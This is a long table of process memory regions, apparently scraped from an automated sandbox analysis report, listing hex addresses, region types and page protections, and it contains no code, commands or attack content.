24A0322B000
|
heap
|
page read and write
|
||
|
23FE43A9000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
700000
|
unkown
|
page readonly
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
21E7C63E000
|
heap
|
page read and write
|
||
|
930000
|
unkown
|
page readonly
|
||
|
2900000
|
unkown
|
page readonly
|
||
|
23FE3DB2000
|
heap
|
page read and write
|
||
|
23FE4326000
|
heap
|
page read and write
|
||
|
2900000
|
unkown
|
page readonly
|
||
|
237E1350000
|
heap
|
page read and write
|
||
|
14C0000
|
direct allocation
|
page read and write
|
||
|
23FE3C1F000
|
heap
|
page read and write
|
||
|
21E63F40000
|
heap
|
page read and write
|
||
|
23FE4482000
|
heap
|
page read and write
|
||
|
85F000
|
stack
|
page read and write
|
||
|
23FE4563000
|
heap
|
page read and write
|
||
|
2898000
|
heap
|
page read and write
|
||
|
9B0000
|
unkown
|
page readonly
|
||
|
23FE3C90000
|
heap
|
page read and write
|
||
|
23FE4393000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE456E000
|
heap
|
page read and write
|
||
|
23FE43B2000
|
heap
|
page read and write
|
||
|
24A03290000
|
heap
|
page read and write
|
||
|
961000
|
unkown
|
page readonly
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A0884F000
|
heap
|
page read and write
|
||
|
2417F170000
|
trusted library allocation
|
page read and write
|
||
|
21E65BAC000
|
trusted library allocation
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
947000
|
unkown
|
page readonly
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE44F1000
|
heap
|
page read and write
|
||
|
23FE4568000
|
heap
|
page read and write
|
||
|
21E624BB000
|
heap
|
page read and write
|
||
|
7FFB4A160000
|
trusted library allocation
|
page read and write
|
||
|
FB878FC000
|
stack
|
page read and write
|
||
|
237E12C6000
|
heap
|
page read and write
|
||
|
78F2000
|
heap
|
page read and write
|
||
|
2417EBFA000
|
heap
|
page read and write
|
||
|
318C000
|
unkown
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3DB3000
|
heap
|
page read and write
|
||
|
24A08A40000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A480000
|
trusted library allocation
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
BCFE1BB000
|
stack
|
page read and write
|
||
|
FB86F4B000
|
stack
|
page read and write
|
||
|
14DB000
|
heap
|
page read and write
|
||
|
18A2000
|
direct allocation
|
page execute and read and write
|
||
|
237E1355000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3E31000
|
heap
|
page read and write
|
||
|
C9C000
|
stack
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A08A20000
|
trusted library allocation
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A088C4000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3E31000
|
heap
|
page read and write
|
||
|
21E74180000
|
trusted library allocation
|
page read and write
|
||
|
101E000
|
heap
|
page read and write
|
||
|
29F0000
|
heap
|
page read and write
|
||
|
23FE456A000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A0885C000
|
heap
|
page read and write
|
||
|
E38000
|
heap
|
page read and write
|
||
|
23FE3C7B000
|
heap
|
page read and write
|
||
|
23FE450C000
|
heap
|
page read and write
|
||
|
E38000
|
heap
|
page read and write
|
||
|
23FE3C1E000
|
heap
|
page read and write
|
||
|
11E4000
|
heap
|
page read and write
|
||
|
2417F090000
|
heap
|
page read and write
|
||
|
2417F303000
|
trusted library allocation
|
page read and write
|
||
|
23FE3C12000
|
heap
|
page read and write
|
||
|
21E65BB4000
|
trusted library allocation
|
page read and write
|
||
|
21E62410000
|
trusted library allocation
|
page read and write
|
||
|
9B1000
|
unkown
|
page execute read
|
||
|
BCFE13E000
|
stack
|
page read and write
|
||
|
23FE432B000
|
heap
|
page read and write
|
||
|
23FE82C2000
|
trusted library allocation
|
page read and write
|
||
|
794F000
|
heap
|
page read and write
|
||
|
140000
|
unkown
|
page readonly
|
||
|
7FFB4A400000
|
trusted library allocation
|
page read and write
|
||
|
24A039E0000
|
trusted library allocation
|
page read and write
|
||
|
23FE457D000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
860000
|
unkown
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
24A08A20000
|
trusted library allocation
|
page read and write
|
||
|
23FE455D000
|
heap
|
page read and write
|
||
|
7FFB4A2F0000
|
trusted library allocation
|
page read and write
|
||
|
24A03297000
|
heap
|
page read and write
|
||
|
23FE3C15000
|
heap
|
page read and write
|
||
|
23FE3DE7000
|
heap
|
page read and write
|
||
|
3B97000
|
unclassified section
|
page execute and read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
931000
|
unkown
|
page execute read
|
||
|
295A000
|
heap
|
page read and write
|
||
|
23FE449F000
|
heap
|
page read and write
|
||
|
23FE4395000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
43C2000
|
unclassified section
|
page read and write
|
||
|
23FE44B8000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A088E7000
|
heap
|
page read and write
|
||
|
237E135A000
|
heap
|
page read and write
|
||
|
7FFB4A320000
|
trusted library allocation
|
page execute and read and write
|
||
|
8C0000
|
unkown
|
page readonly
|
||
|
23FE3C3E000
|
heap
|
page read and write
|
||
|
21E624B5000
|
heap
|
page read and write
|
||
|
8E0000
|
unkown
|
page read and write
|
||
|
7FFB4A3A0000
|
trusted library allocation
|
page read and write
|
||
|
23FE44AF000
|
heap
|
page read and write
|
||
|
23FE3C98000
|
heap
|
page read and write
|
||
|
21E6247A000
|
heap
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
BCFDA7E000
|
stack
|
page read and write
|
||
|
5587000
|
unkown
|
page execute and read and write
|
||
|
784D000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
8BE000
|
stack
|
page read and write
|
||
|
2976000
|
heap
|
page read and write
|
||
|
23FE455D000
|
heap
|
page read and write
|
||
|
A2BA9FE000
|
stack
|
page read and write
|
||
|
23FE4301000
|
heap
|
page read and write
|
||
|
BCFEB8F000
|
stack
|
page read and write
|
||
|
23FE3C77000
|
heap
|
page read and write
|
||
|
237E135A000
|
heap
|
page read and write
|
||
|
24A0325A000
|
heap
|
page read and write
|
||
|
7FFB4A154000
|
trusted library allocation
|
page read and write
|
||
|
23FE42EF000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
25C0000
|
heap
|
page read and write
|
||
|
14D7000
|
heap
|
page read and write
|
||
|
23FE457D000
|
heap
|
page read and write
|
||
|
23FE3DFC000
|
heap
|
page read and write
|
||
|
23FE4407000
|
heap
|
page read and write
|
||
|
24A03200000
|
heap
|
page read and write
|
||
|
7FFB4A380000
|
trusted library allocation
|
page read and write
|
||
|
21E63F7E000
|
heap
|
page read and write
|
||
|
24A088CA000
|
heap
|
page read and write
|
||
|
237E137C000
|
heap
|
page read and write
|
||
|
23FE4526000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A03A15000
|
heap
|
page read and write
|
||
|
23FE4568000
|
heap
|
page read and write
|
||
|
7FFB4A430000
|
trusted library allocation
|
page read and write
|
||
|
23FE3DDB000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE456A000
|
heap
|
page read and write
|
||
|
292E000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3C11000
|
heap
|
page read and write
|
||
|
23FE4326000
|
heap
|
page read and write
|
||
|
21E74409000
|
trusted library allocation
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3C64000
|
heap
|
page read and write
|
||
|
101E000
|
heap
|
page read and write
|
||
|
2C90000
|
trusted library allocation
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
237E1355000
|
heap
|
page read and write
|
||
|
23FE3C7B000
|
heap
|
page read and write
|
||
|
288C000
|
heap
|
page read and write
|
||
|
11E4000
|
heap
|
page read and write
|
||
|
23FE449F000
|
heap
|
page read and write
|
||
|
931000
|
unkown
|
page execute read
|
||
|
23FE3DCC000
|
heap
|
page read and write
|
||
|
93E000
|
unkown
|
page readonly
|
||
|
11E0000
|
heap
|
page read and write
|
||
|
23FE2F20000
|
heap
|
page read and write
|
||
|
23FE4367000
|
heap
|
page read and write
|
||
|
24A08885000
|
heap
|
page read and write
|
||
|
23FE4568000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2913000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE4390000
|
heap
|
page read and write
|
||
|
510000
|
heap
|
page read and write
|
||
|
23FE3C45000
|
heap
|
page read and write
|
||
|
23FE450D000
|
heap
|
page read and write
|
||
|
23FE4402000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
28CF000
|
stack
|
page read and write
|
||
|
23FE4585000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A08856000
|
heap
|
page read and write
|
||
|
237E1399000
|
heap
|
page read and write
|
||
|
7861000
|
heap
|
page read and write
|
||
|
24A08712000
|
trusted library allocation
|
page read and write
|
||
|
FB879FE000
|
unkown
|
page readonly
|
||
|
21E74120000
|
trusted library allocation
|
page read and write
|
||
|
21E64540000
|
trusted library allocation
|
page read and write
|
||
|
2470000
|
heap
|
page read and write
|
||
|
1201000
|
heap
|
page read and write
|
||
|
A2BABFD000
|
stack
|
page read and write
|
||
|
23FE42FE000
|
heap
|
page read and write
|
||
|
23FE3304000
|
heap
|
page read and write
|
||
|
78E3000
|
heap
|
page read and write
|
||
|
2DA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24A039A1000
|
trusted library allocation
|
page read and write
|
||
|
21E7C990000
|
heap
|
page read and write
|
||
|
23FE3DE7000
|
heap
|
page read and write
|
||
|
945000
|
unkown
|
page read and write
|
||
|
399000
|
unkown
|
page read and write
|
||
|
23FE3C19000
|
heap
|
page read and write
|
||
|
23FE3DD2000
|
heap
|
page read and write
|
||
|
23FE42D1000
|
heap
|
page read and write
|
||
|
101E000
|
heap
|
page read and write
|
||
|
23FE3C88000
|
heap
|
page read and write
|
||
|
24A087E0000
|
trusted library allocation
|
page read and write
|
||
|
24A03B04000
|
heap
|
page read and write
|
||
|
32C2000
|
unclassified section
|
page read and write
|
||
|
23FE43A9000
|
heap
|
page read and write
|
||
|
1024000
|
heap
|
page read and write
|
||
|
23FE42F1000
|
heap
|
page read and write
|
||
|
2897000
|
heap
|
page read and write
|
||
|
78EF000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
945000
|
unkown
|
page read and write
|
||
|
2D00000
|
trusted library allocation
|
page read and write
|
||
|
21E7C470000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3E13000
|
heap
|
page read and write
|
||
|
1200000
|
heap
|
page read and write
|
||
|
23FE3C89000
|
heap
|
page read and write
|
||
|
23FE3DE7000
|
heap
|
page read and write
|
||
|
23FE4566000
|
heap
|
page read and write
|
||
|
23FE42F7000
|
heap
|
page read and write
|
||
|
237E12E0000
|
heap
|
page read and write
|
||
|
24A032A1000
|
heap
|
page read and write
|
||
|
23FE4411000
|
heap
|
page read and write
|
||
|
24A08730000
|
trusted library allocation
|
page read and write
|
||
|
21E63FCA000
|
heap
|
page read and write
|
||
|
2E7E000
|
stack
|
page read and write
|
||
|
287F000
|
stack
|
page read and write
|
||
|
21E625B0000
|
heap
|
page read and write
|
||
|
23FE3C86000
|
heap
|
page read and write
|
||
|
BCFD7F3000
|
stack
|
page read and write
|
||
|
BCFDF39000
|
stack
|
page read and write
|
||
|
23FE42F7000
|
heap
|
page read and write
|
||
|
28F0000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
102F000
|
stack
|
page read and write
|
||
|
23FE438E000
|
heap
|
page read and write
|
||
|
23FE42FA000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
D9A000
|
stack
|
page read and write
|
||
|
23FE457D000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
11D0000
|
heap
|
page read and write
|
||
|
2B10000
|
heap
|
page read and write
|
||
|
BCFDD7D000
|
stack
|
page read and write
|
||
|
23FE43AE000
|
heap
|
page read and write
|
||
|
1030000
|
unkown
|
page readonly
|
||
|
510000
|
heap
|
page read and write
|
||
|
24A09000000
|
heap
|
page read and write
|
||
|
22A0000
|
heap
|
page read and write
|
||
|
3C8A000
|
unkown
|
page read and write
|
||
|
2893000
|
heap
|
page read and write
|
||
|
D70000
|
heap
|
page read and write
|
||
|
23FE3DD7000
|
heap
|
page read and write
|
||
|
970000
|
unkown
|
page read and write
|
||
|
23FE3C44000
|
heap
|
page read and write
|
||
|
21E7C630000
|
heap
|
page read and write
|
||
|
1201000
|
heap
|
page read and write
|
||
|
BCFED0B000
|
stack
|
page read and write
|
||
|
BCFDEB7000
|
stack
|
page read and write
|
||
|
237E12DC000
|
heap
|
page read and write
|
||
|
3DF0000
|
unkown
|
page execute and read and write
|
||
|
23FE3C7F000
|
heap
|
page read and write
|
||
|
2417F30A000
|
trusted library allocation
|
page read and write
|
||
|
9D0000
|
unkown
|
page readonly
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE4402000
|
heap
|
page read and write
|
||
|
23FE457D000
|
heap
|
page read and write
|
||
|
23FE44AB000
|
heap
|
page read and write
|
||
|
23FE86C0000
|
trusted library allocation
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
237E139A000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A087F0000
|
trusted library allocation
|
page read and write
|
||
|
1300000
|
direct allocation
|
page read and write
|
||
|
31F2000
|
direct allocation
|
page execute and read and write
|
||
|
21E62457000
|
heap
|
page read and write
|
||
|
28F4000
|
heap
|
page read and write
|
||
|
23FE4520000
|
heap
|
page read and write
|
||
|
33F0000
|
unkown
|
page execute and read and write
|
||
|
2417F313000
|
trusted library allocation
|
page read and write
|
||
|
BCFDAFE000
|
stack
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
143F000
|
stack
|
page read and write
|
||
|
1028000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
237E135A000
|
heap
|
page read and write
|
||
|
7FFB4A4A0000
|
trusted library allocation
|
page read and write
|
||
|
23FE456C000
|
heap
|
page read and write
|
||
|
2897000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
3A56000
|
unclassified section
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE4314000
|
heap
|
page read and write
|
||
|
69F0BFF000
|
stack
|
page read and write
|
||
|
E30000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A08740000
|
trusted library allocation
|
page read and write
|
||
|
14C0000
|
direct allocation
|
page read and write
|
||
|
23FE456A000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE456E000
|
heap
|
page read and write
|
||
|
23FE4479000
|
heap
|
page read and write
|
||
|
23FE42D0000
|
heap
|
page read and write
|
||
|
600000
|
unkown
|
page read and write
|
||
|
237E135D000
|
heap
|
page read and write
|
||
|
7FFB4A490000
|
trusted library allocation
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
7FFB4A4B0000
|
trusted library allocation
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
930000
|
unkown
|
page readonly
|
||
|
11E4000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
237E1355000
|
heap
|
page read and write
|
||
|
2FFA000
|
unkown
|
page read and write
|
||
|
23FE3C40000
|
heap
|
page read and write
|
||
|
237E1355000
|
heap
|
page read and write
|
||
|
8C0000
|
unkown
|
page readonly
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3C91000
|
heap
|
page read and write
|
||
|
331E000
|
unkown
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A08AB0000
|
remote allocation
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
3BE8000
|
unclassified section
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
628000
|
heap
|
page read and write
|
||
|
611000
|
unkown
|
page readonly
|
||
|
237E137F000
|
heap
|
page read and write
|
||
|
23FE3C77000
|
heap
|
page read and write
|
||
|
23FE3C39000
|
heap
|
page read and write
|
||
|
23FE3C40000
|
heap
|
page read and write
|
||
|
2417F170000
|
trusted library allocation
|
page read and write
|
||
|
237E138C000
|
heap
|
page read and write
|
||
|
2417F316000
|
trusted library allocation
|
page read and write
|
||
|
21E65DA6000
|
trusted library allocation
|
page read and write
|
||
|
23FE4518000
|
heap
|
page read and write
|
||
|
23FE4374000
|
heap
|
page read and write
|
||
|
237E12C6000
|
heap
|
page read and write
|
||
|
23FE44C9000
|
heap
|
page read and write
|
||
|
21E625B4000
|
heap
|
page read and write
|
||
|
23FE3C39000
|
heap
|
page read and write
|
||
|
24A03160000
|
heap
|
page read and write
|
||
|
947000
|
unkown
|
page readonly
|
||
|
23FE456C000
|
heap
|
page read and write
|
||
|
920000
|
unkown
|
page read and write
|
||
|
2417EBD7000
|
heap
|
page read and write
|
||
|
7FFB4A170000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A4C0000
|
trusted library allocation
|
page read and write
|
||
|
2897000
|
heap
|
page read and write
|
||
|
23FE3C91000
|
heap
|
page read and write
|
||
|
23FE457D000
|
heap
|
page read and write
|
||
|
23FE457F000
|
heap
|
page read and write
|
||
|
21E64BAA000
|
trusted library allocation
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3C10000
|
heap
|
page read and write
|
||
|
21E623B0000
|
heap
|
page read and write
|
||
|
24A08AB0000
|
remote allocation
|
page read and write
|
||
|
7FFB4A15D000
|
trusted library allocation
|
page execute and read and write
|
||
|
23FE456A000
|
heap
|
page read and write
|
||
|
23FE3E37000
|
heap
|
page read and write
|
||
|
23FE4575000
|
heap
|
page read and write
|
||
|
803F000
|
stack
|
page read and write
|
||
|
237E138C000
|
heap
|
page read and write
|
||
|
23FE4362000
|
heap
|
page read and write
|
||
|
23FE3DDF000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
237E1384000
|
heap
|
page read and write
|
||
|
288C000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE438C000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
7945000
|
heap
|
page read and write
|
||
|
24A032B8000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3150000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE449F000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3DC0000
|
heap
|
page read and write
|
||
|
2C10000
|
trusted library allocation
|
page read and write
|
||
|
23FE3C19000
|
heap
|
page read and write
|
||
|
7FFB4A460000
|
trusted library allocation
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3C98000
|
heap
|
page read and write
|
||
|
7842000
|
heap
|
page read and write
|
||
|
2417F4BE000
|
trusted library allocation
|
page read and write
|
||
|
23FE4575000
|
heap
|
page read and write
|
||
|
24A03A02000
|
heap
|
page read and write
|
||
|
23FE4506000
|
heap
|
page read and write
|
||
|
237E12E3000
|
heap
|
page read and write
|
||
|
E30000
|
heap
|
page read and write
|
||
|
1F0000
|
unkown
|
page readonly
|
||
|
6F0000
|
unkown
|
page readonly
|
||
|
7FFB4A332000
|
trusted library allocation
|
page read and write
|
||
|
23FE3410000
|
trusted library allocation
|
page read and write
|
||
|
11E4000
|
heap
|
page read and write
|
||
|
1015000
|
heap
|
page read and write
|
||
|
23FE3C81000
|
heap
|
page read and write
|
||
|
168D000
|
direct allocation
|
page execute and read and write
|
||
|
23FE3DD4000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
11E4000
|
heap
|
page read and write
|
||
|
23FE4526000
|
heap
|
page read and write
|
||
|
1000000
|
heap
|
page read and write
|
||
|
23FE4514000
|
heap
|
page read and write
|
||
|
75E000
|
stack
|
page read and write
|
||
|
23FE4564000
|
heap
|
page read and write
|
||
|
7885000
|
heap
|
page read and write
|
||
|
23FE3C98000
|
heap
|
page read and write
|
||
|
788A000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2E68000
|
unkown
|
page read and write
|
||
|
75E000
|
stack
|
page read and write
|
||
|
23FE3C98000
|
heap
|
page read and write
|
||
|
23FE3E36000
|
heap
|
page read and write
|
||
|
23FE44CE000
|
heap
|
page read and write
|
||
|
409E000
|
unclassified section
|
page read and write
|
||
|
23FE4563000
|
heap
|
page read and write
|
||
|
147E000
|
stack
|
page read and write
|
||
|
23FE44C5000
|
heap
|
page read and write
|
||
|
931000
|
unkown
|
page execute read
|
||
|
A2BAAFF000
|
stack
|
page read and write
|
||
|
7FFB4A236000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
1689000
|
direct allocation
|
page execute and read and write
|
||
|
24A039F0000
|
trusted library allocation
|
page read and write
|
||
|
23FE3C39000
|
heap
|
page read and write
|
||
|
9D0000
|
unkown
|
page readonly
|
||
|
620000
|
heap
|
page read and write
|
||
|
11E4000
|
heap
|
page read and write
|
||
|
23FE3C22000
|
heap
|
page read and write
|
||
|
23FE4585000
|
heap
|
page read and write
|
||
|
2C39000
|
heap
|
page read and write
|
||
|
8A0000
|
unkown
|
page readonly
|
||
|
23FE457D000
|
heap
|
page read and write
|
||
|
23FE4318000
|
heap
|
page read and write
|
||
|
23FE438E000
|
heap
|
page read and write
|
||
|
69F03FE000
|
stack
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A03B00000
|
heap
|
page read and write
|
||
|
76A000
|
stack
|
page read and write
|
||
|
23FE3DBE000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
237E1384000
|
heap
|
page read and write
|
||
|
24A04220000
|
trusted library allocation
|
page read and write
|
||
|
7930000
|
trusted library allocation
|
page read and write
|
||
|
23FE3C39000
|
heap
|
page read and write
|
||
|
9F0000
|
unkown
|
page read and write
|
||
|
24A08860000
|
trusted library allocation
|
page read and write
|
||
|
23FE3C89000
|
heap
|
page read and write
|
||
|
21E6248E000
|
heap
|
page read and write
|
||
|
23FE3E00000
|
heap
|
page read and write
|
||
|
1E0000
|
unkown
|
page readonly
|
||
|
23FE44A3000
|
heap
|
page read and write
|
||
|
8A0000
|
unkown
|
page readonly
|
||
|
23FE3C39000
|
heap
|
page read and write
|
||
|
24A04040000
|
trusted library allocation
|
page read and write
|
||
|
4597000
|
unclassified section
|
page execute and read and write
|
||
|
288E000
|
heap
|
page read and write
|
||
|
945000
|
unkown
|
page read and write
|
||
|
23FE449F000
|
heap
|
page read and write
|
||
|
1314000
|
heap
|
page read and write
|
||
|
23FE456E000
|
heap
|
page read and write
|
||
|
7FFB4A206000
|
trusted library allocation
|
page read and write
|
||
|
24A08AB0000
|
remote allocation
|
page read and write
|
||
|
1019000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
21E7C69E000
|
heap
|
page read and write
|
||
|
23FE456A000
|
heap
|
page read and write
|
||
|
3F0C4000
|
system
|
page read and write
|
||
|
91E000
|
stack
|
page read and write
|
||
|
154C000
|
heap
|
page read and write
|
||
|
23FE3C98000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3DDA000
|
heap
|
page read and write
|
||
|
24A03329000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE456A000
|
heap
|
page read and write
|
||
|
23FE455D000
|
heap
|
page read and write
|
There are 1262 hidden memdumps, click here to show them.